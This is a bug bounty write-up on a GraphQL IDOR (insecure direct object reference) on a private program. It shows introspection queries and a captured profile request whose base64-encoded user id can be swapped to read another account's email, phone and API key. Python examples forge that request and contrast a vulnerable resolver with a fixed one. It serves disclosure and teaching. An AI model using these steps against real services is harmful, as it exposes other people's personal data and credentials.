GraphQL IDOR leads to information disclosure

Eshan Singh
Dec 24, 2019 · 3 min read

Hello World! I’m Eshan Singh, aka R0X4R. I’m here to share my recent finding: a GraphQL IDOR (Insecure Direct Object Reference) that leads to information disclosure. So, let’s start. I’m signing in…

What is GraphQL?

The GraphQL Foundation defines GraphQL as “an open-source data query and manipulation language for APIs, and a runtime for fulfilling queries with existing data.” Nowadays, GraphQL is increasingly used in place of REST APIs. Because a single endpoint serves every query, authorization has to be enforced per resolver (per object and field), not per URL.

Vulnerability

While doing recon on redacted.com (a private program; per its disclosure policy I cannot name it), I found that the web app uses GraphQL for its API.

So, I first tried an introspection query to extract sensitive information. In the introspection output I saw a type called Users, so I sent

Query: { __type(name: "Users") { name fields { name type { name kind ofType { name kind } } } } }

to enumerate the type definition of “Users”. The type “Users” contains the fields email, mobile_number, user_id, location, and api_key. So, I sent one more query to read the data those fields carry, but I got a 403 (Forbidden) response.

Query: {Users{email,mobile_number,user_id,api_key}}
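As an added example (not the author’s tooling and not the target’s schema), the Python below builds the same per-type introspection query as a JSON body and walks an introspection response to flag fields whose names suggest personal or secret data. The response embedded in the block is constructed for the example; only the field names of the “Users” type are taken from the write-up, and the regex of “sensitive” names is my own choice.

```python
# Added example (not the author's tooling): build the __type query from the
# write-up as a JSON body, then walk an introspection response and flag
# fields whose names suggest personal or secret data.
import json
import re

# Full-schema introspection: one request returns every type and its fields.
SCHEMA_QUERY = (
    "{ __schema { types { name kind fields { name "
    "type { name kind ofType { name kind } } } } } }"
)


def schema_query() -> dict:
    """JSON body for full-schema introspection."""
    return {"query": SCHEMA_QUERY}


def type_query(type_name: str) -> dict:
    """JSON body for the per-type query from the write-up. The type name goes
    in as a variable so it never needs escaping inside the query string."""
    return {
        "query": "query TypeFields($name: String!) { __type(name: $name) "
                 "{ name fields { name type { name kind ofType { name kind } } } } }",
        "variables": {"name": type_name},
    }


# Field-name patterns worth a manual authorization test (my own list).
SENSITIVE = re.compile(
    r"email|phone|mobile|api_?key|token|secret|password|ssn|address", re.I)


def unwrap(type_ref: dict) -> str:
    """Render a possibly NON_NULL/LIST-wrapped type reference as SDL-ish text."""
    kind, name, inner = type_ref.get("kind"), type_ref.get("name"), type_ref.get("ofType")
    if kind == "NON_NULL":
        return unwrap(inner) + "!"
    if kind == "LIST":
        return "[" + unwrap(inner) + "]"
    return name or "?"


def sensitive_fields(introspection: dict) -> dict:
    """Map type name -> [(field, type)] for user-defined object types that
    carry sensitive-looking fields. Built-in __ types and scalars are skipped."""
    hits = {}
    for t in introspection["data"]["__schema"]["types"]:
        if t["name"].startswith("__") or not t.get("fields"):
            continue
        flagged = [(f["name"], unwrap(f["type"]))
                   for f in t["fields"] if SENSITIVE.search(f["name"])]
        if flagged:
            hits[t["name"]] = flagged
    return hits


# Constructed sample response (shape per the GraphQL introspection format).
SAMPLE = {"data": {"__schema": {"types": [
    {"name": "Query", "kind": "OBJECT", "fields": [
        {"name": "User", "type": {"kind": "OBJECT", "name": "Users", "ofType": None}}]},
    {"name": "Users", "kind": "OBJECT", "fields": [
        {"name": "user_id", "type": {"kind": "NON_NULL", "name": None,
                                     "ofType": {"kind": "SCALAR", "name": "ID"}}},
        {"name": "email", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
        {"name": "mobile_number", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
        {"name": "location", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
        {"name": "api_key", "type": {"kind": "SCALAR", "name": "String", "ofType": None}}]},
    {"name": "String", "kind": "SCALAR", "fields": None},
    {"name": "__Type", "kind": "OBJECT", "fields": [
        {"name": "name", "type": {"kind": "SCALAR", "name": "String", "ofType": None}}]},
]}}}


if __name__ == "__main__":
    print(json.dumps(type_query("Users")))
    for type_name, fields in sensitive_fields(SAMPLE).items():
        print(type_name, fields)
```

On a real target the body goes to the GraphQL endpoint as a POST (Burp Repeater or curl both do). Note the asymmetry the write-up hit: introspection was enabled while the data query returned 403. Introspection is rarely the bug itself, but leaving it on in production hands the tester the exact field list (here, api_key) to aim the authorization test at.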

So, I thought the web app was not vulnerable and started hunting for XSS instead. I clicked on My Profile, edited my name and intercepted the request, and saw something interesting: before submitting an edit, the web app first fetches the user’s existing profile data.

Request:
{
  "operationName": "CurrentUserData",
  "variables": { "id": "<base64-encoded id>" },
  "query": "query CurrentUserData($id: ID!) { User(id: $id) { id email name mobile_number apiHostUrl SiteAdminUrl pages(first: 50) { nodes { id faviconUrl name code manageUrl __typename } __typename } __typename } }"
}

So, I sent that request to Repeater. The request has a variable called “id” that contains a base64-encoded value, so I decoded it:

Decoded: oph:cloud:redacted::user/p5yhwx30
First account: r0x4r@hhacker.com
Second account: bcr_rox4r@hacker.com

“p5yhwx30” is my id. So, I created one more account on redacted.com and noted its id: oph:cloud:redacted::user/d5mzk1m2.


Then I logged out of my second account and logged in with my first account. Now I sent the same query, but with my “id” replaced by the second account’s “id”, and boom! I got the second account’s information.
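The exchange described above, as an added example that is not the target’s code or the author’s script: the captured request’s id variable is base64 of a predictable URN, so a second user’s URN can be encoded and dropped in while the session stays the first user’s. The in-memory user table and the dispatcher are constructed for the example (the two emails are the accounts from the write-up; nothing else is taken from the target). The vulnerable resolver trusts the id from the query; the fixed one compares it against the identity the server already knows from the session.

```python
# Added example (not the target's code). Both sides of the IDOR from the
# write-up: the client forges the id variable, and a resolver either trusts
# it (vulnerable) or checks it against the session (fixed).
import base64
import copy
import json

# Constructed stand-in for the captured request; field list as in the write-up.
QUERY = """query CurrentUserData($id: ID!) {
  User(id: $id) { id email name mobile_number apiHostUrl SiteAdminUrl
    pages(first: 50) { nodes { id faviconUrl name code manageUrl } } }
}"""


def encode_id(urn: str) -> str:
    """The app's "opaque" id is plain base64 of a URN (as the write-up found)."""
    return base64.b64encode(urn.encode()).decode()


def decode_id(token: str) -> str:
    return base64.b64decode(token).decode()


def captured_request(own_urn: str) -> dict:
    """What the profile page sends for the logged-in user."""
    return {"operationName": "CurrentUserData",
            "variables": {"id": encode_id(own_urn)},
            "query": QUERY}


def forge_request(captured: dict, victim_urn: str) -> dict:
    """Attacker step: keep operation and query intact, swap only the id."""
    forged = copy.deepcopy(captured)
    forged["variables"]["id"] = encode_id(victim_urn)
    return forged


# --- server side: constructed in-memory data (hypothetical, not the target's) ---
USERS = {
    "oph:cloud:redacted::user/p5yhwx30": {"email": "r0x4r@hhacker.com"},
    "oph:cloud:redacted::user/d5mzk1m2": {"email": "bcr_rox4r@hacker.com"},
}


class Forbidden(Exception):
    pass


def resolve_user_vulnerable(args: dict, context: dict) -> dict:
    """Looks up whatever id the client sent; the session in `context` is
    ignored, so any authenticated user can read any other user's record."""
    return USERS.get(decode_id(args["id"]))


def resolve_user_fixed(args: dict, context: dict) -> dict:
    """Authorizes on the server-side session identity, not the query variable."""
    requested = decode_id(args["id"])
    if requested != context["viewer_urn"]:
        raise Forbidden("not your record")
    return USERS.get(requested)


def handle(request: dict, session_urn: str, resolver) -> dict:
    """Minimal GraphQL-style dispatcher: {"data": ...} or {"errors": [...]}.
    `session_urn` is who the server knows is logged in (cookie/token)."""
    context = {"viewer_urn": session_urn}
    try:
        return {"data": {"User": resolver(request["variables"], context)}}
    except Forbidden as exc:
        return {"errors": [{"message": str(exc)}]}


if __name__ == "__main__":
    me = "oph:cloud:redacted::user/p5yhwx30"
    victim = "oph:cloud:redacted::user/d5mzk1m2"
    req = captured_request(me)
    print("decoded id:", decode_id(req["variables"]["id"]))
    forged = forge_request(req, victim)        # session still belongs to `me`
    print("vulnerable:", json.dumps(handle(forged, me, resolve_user_vulnerable)))
    print("fixed:     ", json.dumps(handle(forged, me, resolve_user_fixed)))
```

The fix is not to hide or obfuscate the id (base64 and ids in page source are not secrets) but to authorize in every resolver that takes an object identifier, with the server-side session as the subject. Where some principals legitimately read other users (support staff, org admins), the equality check becomes a policy lookup, but it still keys off the session, never the query variable.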


But one problem remained: how do I get another user’s “id”? After some enumeration, I found that the “id” of other users is in the source of their profile page. I just had to open their profile, view the page source and search for “var_userID” to get their “id”.


Disclosure:

Reported to redacted.com on 15 Nov 2019

They rewarded me with a three-digit bounty on 07 Dec 2019.

Thanks and regards!

Eshan Singh [R0X4R]

Signing out…


Written by Eshan Singh

Hi, I’m that hacker teenager that your friends told you about. I hack to make systems secure. Hacker, Developer, Influencer, Graphics Designer.

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to VulnHub machines, hardware challenges and real-life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew.
